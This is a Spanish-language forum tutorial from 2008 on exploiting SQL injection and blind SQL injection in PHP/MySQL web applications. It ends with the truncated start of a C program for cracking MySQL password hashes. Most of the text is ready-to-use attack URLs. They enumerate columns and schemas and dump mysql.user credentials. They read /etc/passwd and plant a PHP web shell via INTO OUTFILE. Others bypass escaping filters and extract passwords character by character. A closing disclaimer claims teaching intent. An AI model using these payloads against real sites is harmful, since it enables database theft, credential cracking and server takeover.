Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: 6666 en 5 Diciembre 2008, 00:28 am



Título: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: 6666 en 5 Diciembre 2008, 00:28 am
+--------------------------------------------------------+
|                                                                   |
|      SQL injection && Blind Sql Injection      |
|                                                                   |
|                   Escrito por l0ve              |
|                                                                   |
+--------------------------------------------------------+

¿Qué es sql injection?

"Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la
base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las
partes del programa con código SQL. Es, de hecho, un error de una clase más general de
vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté
incrustado dentro de otro.
Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro
código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código
"invasor" en la base de datos."

Fuente:
http://es.wikipedia.org/wiki/Inyección_SQL (http://es.wikipedia.org/wiki/Inyección_SQL)

¿Qué vamos a ver?

Vamos a buscar, reconocer y explotar de distintas formas "inyecciones SQL" en aplicaciones web con bases de datos MySQL version 4.x o 5.x ..

aclaración: Algunas cosas explicadas acá puede ser que no funcionen en otras base de datos ya que no todas son iguales, hay variedades de ellas ... mysql, mssql (sql server), sqlite, oracle etc ..

Antes de empezar vamos a repasar algunas cosas básicas:

? enlaza la URL con los parámetros.
& delimita donde termina un parámetro y donde comienza el otro.
= asigna el valor.

Recuerda bien ;).

Empecemos ...

Nota: En los ejemplos voy a usar siempre "localhost" y un script en php llamado "print.php"


¿Cómo reconocer una vulnerabilidad sql?

Hay varias formas de hacerlo, entre ellas puede ser usando una comilla simple ` (``%27``) al
final de la URL:

http://localhost/print.php?id=332`

también con:

- paréntesis ")"
- "comentarios" como ``/*`` , ``--`` o "#"
- palabras del lenguaje sql como "select,order by" etc ..

Ejemplos:

http://localhost/print.php?id=12) --
http://localhost/print.php?id=12)) --
http://localhost/print.php?id=12 `--
http://localhost/print.php?id=12 `) --
http://localhost/print.php?id=12 `)) --

veamos:

(http://img201.imageshack.us/img201/2907/pantallazo1nq2.png) (http://imageshack.us)
(http://img201.imageshack.us/img201/pantallazo1nq2.png/1/w1152.png) (http://g.imageshack.us/img201/pantallazo1nq2.png/1/)


el tema con los "comentarios" es que puede ser que con un tipo de comentario funcione y con el otro no .. por ejemplo:

Con /*:

(http://img153.imageshack.us/img153/9775/pantallazo6bt1.png) (http://imageshack.us)
(http://img153.imageshack.us/img153/pantallazo6bt1.png/1/w1152.png) (http://g.imageshack.us/img153/pantallazo6bt1.png/1/)

Con --:

(http://img241.imageshack.us/img241/1391/pantallazo7zf9.png) (http://imageshack.us)
(http://img241.imageshack.us/img241/pantallazo7zf9.png/1/w1152.png) (http://g.imageshack.us/img241/pantallazo7zf9.png/1/)


además de los ejemplos anteriores se pueden usar "operadores lógicos" ..

ejemplo:

http://localhost/print.php?id=1 and 1=1

Y luego:
                                       
http://localhost/print.php?id=1 and 1=2

vemos que al hacer la primera inyección la pagina se imprime normalmente ... pero al inyectar lo
segundo vemos que se devuelve modificada (a veces vacía o falta algún contenido, se notara la diferencia).
Si al hacer algunas de estas inyecciones obtenemos algo como: "You have an error in your SQL
syntax; check the manual that " o algo parecido .. sabemos que es vulnerable a
sql injection.

(http://img209.imageshack.us/img209/7611/pantallazo2jm2.png) (http://imageshack.us)
(http://img209.imageshack.us/img209/pantallazo2jm2.png/1/w1152.png) (http://g.imageshack.us/img209/pantallazo2jm2.png/1/)

(http://img357.imageshack.us/img357/5663/pantallazo3tn3.png) (http://imageshack.us)
(http://img357.imageshack.us/img357/pantallazo3tn3.png/1/w1152.png) (http://g.imageshack.us/img357/pantallazo3tn3.png/1/)


No solo se puede usar "AND" existen otros operadores lógicos:

1 && 1 //Representa el AND
1 || 1 //Representa el OR
1 XOR 0 //Retorna null si alguno de ellos es null
! //Representa NOT se evalúa 1 si el operando es 0 y a 0 si el operando es distinto a 0.


Explorando la base de datos

Vamos a averiguar el numero de columnas ...

¿Cómo hacemos eso? ¡Fácil!, usamos el `order by` e iremos incrementando o viceversa según los
resultados veamos.

http://localhost/print.php?id=-1 order by 1/* <---- no muestra un error
http://localhost/print.php?id=-1 order by 2/* <---- no muestra un error
...
http://localhost/print.php?id=-1 order by 14/* <-------- no muestra un error
http://localhost/print.php?id=-1 order by 15/* <-------- no muestra un error
http://localhost/print.php?id=-1 order by 16/* <-------- no muestra un error
http://localhost/print.php?id=-1 order by 17/* <-------- error

Cuando hay un error nos mostrara algo así:

"Unknown column `17` in `order clause"

Como podemos ver hay 16 columnas.

(http://img201.imageshack.us/img201/5628/pantallazo4tk0.png) (http://imageshack.us)
(http://img201.imageshack.us/img201/pantallazo4tk0.png/1/w1152.png) (http://g.imageshack.us/img201/pantallazo4tk0.png/1/)

(http://img259.imageshack.us/img259/2674/pantallazo5dl9.png) (http://imageshack.us)
(http://img259.imageshack.us/img259/pantallazo5dl9.png/1/w1152.png) (http://g.imageshack.us/img259/pantallazo5dl9.png/1/)


Pero hay veces que esto no es posible y tendremos que usar UNIÓN
(Sentencia UNIÓN:
Se usa
para combinar los resultados de varias sentencias SELECT en un único conjunto de resultados.)

http://localhost/print.php?id=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Ahí la pagina nos puede imprimir unos números o tal vez puede verse que falta de algún contenido pero
sabremos que la unión funciona .. también podemos hacer:

union all select 1/*
union all select 1,2/*
union all select 1,2,3/*
..
y así sucesivamente hasta encontrar la cantidad de columnas.


Saber la versión de mysql y entre otros datos útiles

Bueno ahora analicemos la inyección de más arriba ..

http://localhost/print.php?id=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Como pueden ver no explique el -1 .. no quiere decir que siempre hay que ponerlo .. pueden usar cualquier numero.


Lo que hay que hacer ahora es reemplazar alguno de esos números por inyecciones que nos pueden dar algunos datos del servidor (estos números corresponde a una columna de la tabla).

Versión:

http://localhost/print.php?id=-1+union+all+select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16/
*

(se pude usar @@version o version())

Ejemplo:

(http://img241.imageshack.us/img241/6568/pantallazo8ut9.png) (http://imageshack.us)
(http://img241.imageshack.us/img241/pantallazo8ut9.png/1/w1152.png) (http://g.imageshack.us/img241/pantallazo8ut9.png/1/)

(se pude usar @@version o version())

Tendrás algo como "4.1.20-log"

Los @@ son variables del sistema,por ejemplo podríamos hacer algo como @@servename.

Es importante saber la versión de MySQL ya que podría facilitarnos la inyección ..

version() Devuelve la versión del servidor MySQL.
database() Devuelve el nombre de la base de datos actual.
current_user() Devuelve el nombre de usuario y el del host para el que está autentificada la
conexión actual. Este valor corresponde a la cuenta que se usa para evaluar los privilegios de
acceso. Puede ser diferente del valor de USER().
last_insert_id() Devuelve el último valor generado automáticamente que fue insertado en una
columna AUTO_INCREMENT.
connection_id() Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID.
@@datadir directorio de la db.

un problema frecuente .. ¿Por qué me dice que es ilegal, implícita etc ..?

ok .. para evitarlo se hace de la siguiente forma:

con la función convert().

http://localhost/print.php?id=-1+union+all+select 1,convert(@@version using
latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

con hex() y unhex():

http://localhost/print.php?id=-1+union+all+select
1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

aes_encrypt & aes_decrypt

http://localhost/print.php?id=-1+UNION+SELECT+1,2,3,aes_decrypt(aes_encrypt(user,1),1),5+from+mysql.user--

COMPRESS , UNCOMPRESS

http://localhost/print.php?id=-1+UNION+SELECT+1,2,3,UNCOMPRESS(COMPRESS(user)),5+from+mysql.user--


Bueno hasta acá ya tenemos bastantes datos interesantes sobre el servidor y ademas sabemos si es vulnerable o no .. sigamos.


Algunas veces nos podemos encontrar con filtros que nos lian las inyecciones, pero hay varias forma de "saltarlos" por ejemplo:


http://localhost/print.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(@@versión)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

http://localhost/print.php?id=-1/**/uNion/**/aLl/**/sElEcT/**/1,unhEx(hex(@@versión)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*




Obteniendo tabla,nombre de columna y otros datos

Vamos a ver como hacer al tener una versión 5 de MySQL:

Para tener una lista de los privilegios podemos hacer:

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

hay algo nuevo y es CONCAT (concat une datos dentro de una consulta sql).
Con esto nos ahorraríamos de hacer inyecciones ..

si algún dato no existe en la base de datos "concat" produce un error .. y si no hay contenido larga NULL.

pero todo sale muy junto? ..¿Cómo podemos evitar esto?

Podemos pasar algún carácter a hexadecimal o usando char() (pasando el valor a ascii).

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable)3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

Vemos que 0x3a es un valor en hex y representa ":"

Entonces obtendremos algo así:

``primerdato:segundodato`` y no ``primerdatosegundodato``

Y así con cualquier carácter por ejemplo "=" en hexa (0x3D) Obtendríamos:

``primerdato=segundodato``

Y en ascii:

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,char(58),privilege_type,char(58),is_grantable)3,4,5,6,7,8,
9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

Ejemplo:

(http://img241.imageshack.us/img241/4715/pantallazo9xv6.png) (http://imageshack.us)
(http://img241.imageshack.us/img241/pantallazo9xv6.png/1/w1152.png) (http://g.imageshack.us/img241/pantallazo9xv6.png/1/)

y ..

(http://img241.imageshack.us/img241/3053/pantallazo10ez9.png) (http://imageshack.us)
(http://img241.imageshack.us/img241/pantallazo10ez9.png/1/w1152.png) (http://g.imageshack.us/img241/pantallazo10ez9.png/1/)

Como podemos ver en la segunda imagen aparece unos : (dos puntos)

o con char():

(http://img122.imageshack.us/img122/1842/pantallazo11db8.png) (http://imageshack.us)
(http://img122.imageshack.us/img122/pantallazo11db8.png/1/w1152.png) (http://g.imageshack.us/img122/pantallazo11db8.png/1/)

como podemos ver lo separamos con ^.

Nota: Para saber los valores ascii: http://www.ascii.cl/es/ (http://www.ascii.cl/es/)

o Sencillo script en perl para pasar una cadena de caracteres a HEX:

Código:
print "Enter string to encode:";
$str=<STDIN>;chomp $str;
$enc = encode($str); print "Hex Encoded value: 0x$enc\n";
sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];
@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {
$encoded = sprintf(`%lx`,$line);
$encoded_command .= $encoded;
}
return $encoded_command;
}

Tambien podemos usar concat_ws() (concat_ws() que utiliza el primer argumento para separar el resto:

(http://img389.imageshack.us/img389/4782/pantallazo13ov1.png) (http://imageshack.us)
(http://img389.imageshack.us/img389/pantallazo13ov1.png/1/w1152.png) (http://g.imageshack.us/img389/pantallazo13ov1.png/1/)

o aprovechar los numeros que devuelve la página para poner en ellos algo diferente por ejemplo:

(http://img291.imageshack.us/img291/2955/pantallazo26ro6.png) (http://imageshack.us)
(http://img291.imageshack.us/img291/pantallazo26ro6.png/1/w1152.png) (http://g.imageshack.us/img291/pantallazo26ro6.png/1/)

como ven muestra la base de datos,la tabla y la columna.

en este caso blog es la base .. blog_lb_authors es la tabla y id es la columna.



Bueno seguimos ..

otras formas para obtener una lista de privilegios:

http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,Select_priv,0x3a,Insert_priv,0x3a,Update_pri
v,0x3a,Delete_priv,0x3a,Create_priv,0x3a,Drop_priv,0x3a,Reload_priv,0x3a,Shutdown_priv,0x3a,P
rocess_priv,0x3a,File_priv,0x3a,Grant_priv,0x3a,References_priv,0x3a,Index_priv,0x3a,Alter_priv,
0x3a,Show_db_priv,0x3a,Super_priv,0x3a,Create_tmp_table_priv,0x3a,Lock_tables_priv,0x3a,Exe
cute_priv,0x3a,Repl_slave_priv,0x3a,Repl_client_priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+m
ysql.user--

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,table_schema,0x3a,privilege_type),3,4,5,6,7,8,9,10,
11,12,13,14,15,16+FROM+information_schema.schema_privileges--
http://localhost/print.php?
id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3a,privileg
e_type),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_schema.column_privileges--

una lista sobre las base de datos:

http://localhost/print.php?id=-1+union+all+select+1,schema_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_s
chema.schemata--

http://localhost/print.php?id=-1+union+all+select+1,distinct(db),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+mysql.db--

una lista de columnas:

http://localhost/print.php?
id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,
10,11,12,13,14,15,16+FROM+information_schema.columns--

También se puede leer algún archivo local como "/etc/passwd":

http://localhost/print.php?id=-1+union+all+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14,15,1
6--

El /etc/passwd esta en hex.

Ejemplo:

(http://img357.imageshack.us/img357/6180/pantallazo12xx0.png) (http://imageshack.us)
(http://img357.imageshack.us/img357/pantallazo12xx0.png/1/w1152.png) (http://g.imageshack.us/img357/pantallazo12xx0.png/1/)

o obtener un user y pass de la db para poder acceder remotamente a ella:

http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6,7,8,9,
10,11,12,13,14,15,16+FROM+mysql.user--

Ejemplo:

(http://img75.imageshack.us/img75/8233/pantallazo22ga4.png) (http://imageshack.us)
(http://img75.imageshack.us/img75/pantallazo22ga4.png/1/w1152.png) (http://g.imageshack.us/img75/pantallazo22ga4.png/1/)

nos imprimio el host,el usuario y por supuesto el password .. ahora lo que nos queda es crackear el
hash (pueden usar john the ripper etc ..) y controlar si esta abierto el puerto 3306.

Ejemplo:

(http://img241.imageshack.us/img241/8228/pantallazo23uk3.png) (http://imageshack.us)
(http://img241.imageshack.us/img241/pantallazo23uk3.png/1/w1152.png) (http://g.imageshack.us/img241/pantallazo23uk3.png/1/)

y podernos conectar remotamente:

(http://img20.imageshack.us/img20/2249/pantallazo24wt2.png) (http://imageshack.us)
(http://img20.imageshack.us/img20/pantallazo24wt2.png/1/w1152.png) (http://g.imageshack.us/img20/pantallazo24wt2.png/1/)

buscando cosas interesantes:

(http://img241.imageshack.us/img241/8297/pantallazo25gh2.png) (http://imageshack.us)
(http://img241.imageshack.us/img241/pantallazo25gh2.png/1/w1152.png) (http://g.imageshack.us/img241/pantallazo25gh2.png/1/)


Nota: se puede usar cualquier cliente mysql en este caso uso la c99.


Una forma para intentar buscar nombres de columnas:

Buscando algún nombre de tabla .. en este caso largo auth ..

http://localhost/print?id=-1 union all select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from
information_schema.tables where table_schema = database()

Pasando valor a ascii y buscando ..

http://localhost/print.php?id=-1 union all select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from information_schema.columns where table_name = char(97,117,116,104) and column_name
like char()

Pasar en ascii "%a%" quedando:

http://localhost/print.php?id=-1 union all select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from information_schema.columns where table_name = char(97,117,116,104) and column_name
like char(37,97,37)

En esta inyección por ejemplo estaríamos buscando un nombre de columna pasadas en ascii.
Y ahí te larga palabras y luego obtener datos :)

Sacando demàs tablas,columnas etc .. de la base:

Bueno hay algunas veces que al hacer una inyeccion y hacer algo asi:

-1 union all select table_name from information_schema.tables

obtendremos todas todas las tablas impresas de una sola vez .. pero otras veces no ..

por ejemplo:

(http://img357.imageshack.us/img357/2441/pantallazo16co6.png) (http://imageshack.us)
(http://img357.imageshack.us/img357/pantallazo16co6.png/1/w1152.png) (http://g.imageshack.us/img357/pantallazo16co6.png/1/)

Como podemos ver tira todas las tablas .. en cambio en esta no:

(http://img403.imageshack.us/img403/3509/pantallazo17iv7.png) (http://imageshack.us)
(http://img403.imageshack.us/img403/pantallazo17iv7.png/1/w1152.png) (http://g.imageshack.us/img403/pantallazo17iv7.png/1/)


Asi que para ver la siguiente tabla usaremos limit al final de la url ejemplo:

-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 1,1--

Ejemplo:

(http://img403.imageshack.us/img403/9270/pantallazo19hr9.png) (http://imageshack.us)
(http://img403.imageshack.us/img403/pantallazo19hr9.png/1/w1152.png) (http://g.imageshack.us/img403/pantallazo19hr9.png/1/)

como podemos ver saco la siguiente tabla .. solo nos quedaria incrementar limit ..

-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 2,1--
-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 3,1--
..
-1 union all select 1,2,3,4,5,6 from information_schema.tables limit 15,1--

etc .. entendido? Ok, esto del limit lleva mucho tiempo .. por que saca datos de toda la base de datos
al menos que evitemos lo que no queremos ver :P ejemplo ..

en mysql existen 2 base de datos una se llama information_schema  y la otra mysql .. (Instalen mysql y exploren lo que hay dentro de ellas)

pero si de verdad necesitamos evitarlas con el fin de encontrar algun password de algun panel de administracion etc .. podemos hacer algo asi:

1+union+all+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+WHERE+table_schema!=0x6d7973716c+AND+table_schema+!=0x696e666f726d6174696f6e5f736368656d61+limit+100,1--

como podemos ver .. pase information_schema y mysql a HEX logrando que evite buscar alguna informacion en ellas.

aparte de usar limit podriamos usar group_concat() lo que haria es largar nombres de tabla pero no todas ejemplo:

(http://img140.imageshack.us/img140/1161/pantallazo20lr7.png) (http://imageshack.us)
(http://img140.imageshack.us/img140/pantallazo20lr7.png/1/w1152.png) (http://g.imageshack.us/img140/pantallazo20lr7.png/1/)

y para evitar el tema de que aparezca todo junto podriamos hacer algo asi:

(http://img339.imageshack.us/img339/6418/pantallazo21nu3.png) (http://imageshack.us)
(http://img339.imageshack.us/img339/pantallazo21nu3.png/1/w1152.png) (http://g.imageshack.us/img339/pantallazo21nu3.png/1/)

como podemos ver puse: 0x3C62723E que seria un salto de linea en html osea <br>.


TUTORIAL DE PonyMagic

  • Como muchos saben, con Group_concat(), el límite es de unos 250 caracteres, por eso al printear un concateo relativamente grande "se corta" hoy les voy a mostrar 2 formas para estirar esos 250 caracteres, una muy simple, y la otra... masomenos :P
  • El 1er Semitip` que tengo, es que cuando usen Group_concat(), realizen un cast() al objeto y lo hagan una variable CHAR. con esto aumentamos la cantidad de caracteres a 1024 que es el seteado group_concat_max_len (inmodificable desde una inejct) . También, para los que setean el delimitador dentro del group, les recomiendo replazar "," por "<br>" luego con replace(). Sino, estamos gastando esos valiosos 1024chars, esto es lo máximo que sacaremos de un solo select con group_concat:
Código:
Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)

  • hasta ahí vamos a poder llegar con group_concat, pero también voy a "enseñar" una forma para realizar un "limit casero" en el concateo :) supongamos que tenemos esta inject:
Código:
id=1 and 1=2 union select 1,2,3,4--

 
  • lo 1ro que vamos a hacer, es un select pidiendo las tablas a information_schema.
Código:
id=1 and 1=2 union select 1,(
Select
Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)
from information_schema.tables
),3,4--

(http://i34.tinypic.com/2rdjk0k.png)

  • Lo que nos devolvería los 1ros 1024chars del concateo. Ahora con este "limit casero" vamos a crear una query que pida los siguientes 1024 caracteres. Para eso vamos a usar la funcion INSTR()
Código:
id=1 and 1=2 union select 1,(
Select
Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)
from information_schema.tables

Where

INSTR(
(Select Group_concat(Cast(Table_Name AS CHAR)) from information_schema.tables),
Table_Name
) = 0

),3,4--


  • Con esto ya tenemos 3072 chars, algo asi como ... 205 resultados ( si fueran de al rededor de 15chars c/u ) en solo 3 consultas. sino, tendríamos que haber realizado 205 consultas modificando el limit de 1 en 1...
  • Bueno, por ahora solo eso, porximamente talvez haga algo en JS que edite el link y eso para tener una inject modelo con un botoncito siguiente =P
FIN TUTO (Gracias por esta info, de verdad muy valiosa.)

Link blog PonyMagic: http://ponymagic.diosdelared.com (http://ponymagic.diosdelared.com)



En versiones MySQL 4 o sin permiso para information_schema la unica forma de obtener tablas y columnas es adivinándolas ..

por ejemplo:

http://localhost/print.php?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from admin--  > error

http://localhost/print.php?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from adm--    > error

http://localhost/print.php?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from administrador--  > válido

y de la misma forma para columnas:

http://localhost/print.php?id=-1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from administrador--  > error

http://localhost/print.php?id=-1 union all select 1,pwd,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from administrador--  > error

http://localhost/print.php?id=-1 union all select 1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16
from administrador--  > válido



¿Para qué podría servir todo esto?

Desde leer archivos de configuraciones, archivos en si, etc .. solo es
cuestión de imaginación como por ejemplo obtener una shell del servidor haciendo algo como:

UNION SELECT "<? system($_REQUEST[`cmd`]); ?>",2,3,4 INTO OUTFILE
"/var/www/html/mishell.php" --

por ejemplo: (Una vez echa la inyeccion)

(http://img185.imageshack.us/img185/4121/pantallazo14dq1.png) (http://imageshack.us)
(http://img185.imageshack.us/img185/pantallazo14dq1.png/1/w1152.png) (http://g.imageshack.us/img185/pantallazo14dq1.png/1/)

y usando la shell:

(http://img687.imageshack.us/img687/931/pantallazo15.png) (http://img687.imageshack.us/img687/931/pantallazo15.png)

Lo que estaríamos haciendo es metiendo el contenido de un script en php y guardándolo en alguna parte
del servidor.

si necesitan la ruta del servidor pueden verla en /etc/passwd ejemplo:

apache:x:48:48:Apache:/var/www:/sbin/nologin

en el httpd.conf:

/etc/httpd/conf/httpd.conf

(la ruta varia)

viendo el code de alguna web del servidor .. como index.php,noticias.php o cualquiera.

o usar alguna tecnica como Full Path Disclosure:

http://www.owasp.org/index.php/Full_Path_Disclosure (http://www.owasp.org/index.php/Full_Path_Disclosure)

Para hacer esto y algunas inyecciones más,necesitamos saltarnos las magic_quotes que son las que no
nos dejan hacer nuestras inyecciones con eficiencia :P para eso existen algunas formas ..

Como el "double encoding" bastante interesante y leer

(http://www.owasp.org/index.php/Double_Encoding (http://www.owasp.org/index.php/Double_Encoding))

hex encoding

para saltar filtros como las magic_quotes leer sobre "SQL Smuggling".

También como he leído por ahí .. podríamos saltar algunos de los filtros que posee PHP veamos:
-------------------------------------------------------
(MySQL 4.1.x o posterior: 4.1.20 y 5.0.x)
bypass a addslashes() con codificaciòn GBK
WHERE x = 0xbf27admin 0xbf27
-------------------------------------------------------
bypass mysql_real_escape_string() con BIG5 o GBK
se pueden poner caracteres chinos no hemos puesto el ejemplo por problemas de codificacion
pero es posible saltarse el mysql_real_escape() de esta forma.
aparte de ser caracteres chinos es BIG5 :P
-------------------------------------------------------
Vectores avanzados:

Usando HEX para bypassear una consulta:

Consulta normal:

SELECT * FROM login WHERE user = `root`

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Insertando nuevo usuario en SQL.


Consulta Normal:
insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0×726F6F74, pass = 0×726F6F74
--------------------------------------------------------
Como determinar el HEX? bueno se puede usar el programita de perl màs arriba o simplemente haciendo
algo como:

SELECT HEX(`root`);
obtendremos algo como:
726F6F74
y luego le agregamos:
0x
quedaría: 0×726F6F74

Tambien hace poco me encontre un articulo interesante del amigo xianur0 :P:

http://xianur0.blogspot.com/2008/10/rootear-servidor-mediante-sql-injection.html (http://xianur0.blogspot.com/2008/10/rootear-servidor-mediante-sql-injection.html)

seria bueno que lo lean.

Para ver si las magic_quotes estan activadas simplemente agreguen una ` (comilla siemple) si aparece algo asi:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `\`` at line 1

es que no es posible por que aparece una barra invertida provocando un error en la base de datos ..

pero si aparece algo asi:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ``` at line 1

sabremos que no pasa nada con la comilla simple y tendremos màs posibilidades .. y inyecciones no tan complejas  ademàs de poder actualizar datos,borrar etc ..

Ahora blind sql injection

es un poco más liado .. pero aquí va:

Sabiendo si es vulnerable a Bsql

Tenemos que saber esto:

http://localhost/print.php?id=-1 and 1 = 1 <--- esto siempre sera verdadero.
http://localhost/print.php?id=-1 and 1 = 2 <--- esto siempre sera falso.

Nota: Recordarlo siempre.

Si luego de probar http://localhost/print.php?id=-1 and 1 = 2 no regreso algo de la pagina, un texto o
etc sabemos que es vulnerable a bsql.
                                             
Sabiendo la versión de mysql:

http://localhost/print.php?id=-1 and substring(@@versión,1,1)=4 <--- si nos larga la pagina normal
(si es verdadero) sera versión 4.

http://localhost/print.php?id=-1 and substring(@@versión,1,1)=5 <--- si nos larga la pagina normal
(si es verdadero) sera versión 5.

Podemos usar select pero si tenemos problemas podremos usar subselect.

http://localhost/print.php?id=-1 and (select 1 from mysql.user limit 0,1)=1

Si nos larga verdadero tendremos acceso a mysql.user y podremos obtener ficheros del servidor
como /etc/password y etc ... usando load_file() y outfile.

Buscando nombre de tabla y columna

Puede ser difícil y con ganas de cagarte en muchas cosas xD.

Adivinando la tabla:

Hacemos esto:

http://localhost/print.php?id=-1 and (select 1 from members limit 0,1)=1

Nota: con LIMIT 0,1 nuestra consulta devuelve 1 fila de datos por causa de subselect por eso es
importante. RECODARLO

Si la pagina carga normalmente sabremos que el nombre de la tabla es la correcta si esto no es así
tendremos que seguir adivinando.

Ahora la columna:

http://localhost/print.php?id=-1 and (select substring(concat(1,password),1,1) from members limit
0,1)=1

Si la pagina carga normalmente sabremos que es la correcta de lo contrario a adivinar /* :@ */

Extrayendo datos

Supongamos que ya tenemos nombre de la columna y la tabla:

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),1,1))>80

El 80 es un carácter en ascii si nos da falso tenemos que aumentar hasta que de verdadero.

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),1,1))>95

Da falso así que incrementamos.

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),1,1))>95
http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),1,1))>98

Nos da falso.

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),1,1))>99

Verdadero!

Por lo que el primer carácter en el nombre de usuario es char(99). Y convirtiéndolo a ascii sabemos
que char (99) es la letra c.

Entonces vamos a comprobar el segundo carácter:

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),2,1))>99

Fíjense que estoy cambiado, a 1,1, 2,1 para obtener el segundo carácter, ahora vuelve el segundo
carácter, 1 carácter de longitud.

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),2,1))>99

Nos da falso e incrementamos:

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),2,1))>107

Nos da falso y buscamos un numero menor.

http://localhost/print.php?id=5 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),2,1))>104

Falso, incrementamos ..

http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
members limit 0,1),2,1))>105

Verdadero!

Sabemos que el segundo carácter es char(105) y que es ``i`` vamos ``ci`` y seguimos incrementando,
cuando > 0 devuelve falso, sabemos que llegamos al final.


Hay herramientas que hacen que esto no sea muy pesado:

http://www.seguridadinformatica.es/profiles/blog/show?id=1024177%3ABlogPost%3A16301 (http://www.seguridadinformatica.es/profiles/blog/show?id=1024177%3ABlogPost%3A16301)

http://sqlmap.sourceforge.net (http://sqlmap.sourceforge.net) < HERMOSA HERRAMIENTA :$

Les recomiendo leer el tutorial que hizo ka0x que contiene un script donde podemos aplicar los
conocimientos de aquí y el que he usado a lo largo del tutorial :).(http://www.milw0rm.com/papers/download/216)

MySQL cheat sheet:
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

MySQL cheat sheet: http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/ (http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/)  (Màs que interesante)

La intencion de este tutorial es solo enseñar y evitar este tipo de vulnerabilidades ..
no me responsabilizo de mal uso de esta información
espero que les sirva!!

TODA LA LECTURA ES OBLIGATORIA

publiquen sus tips,errores o duda en esta publicación :).


Saludos!

---------------------------------

tools:

el soft que use para descifrar el pass:

mysqlfast.c

Código:
/* This program is public domain. Share and enjoy.
*
* Example:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/

#include <stdio.h>

typedef unsigned long u32;

/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
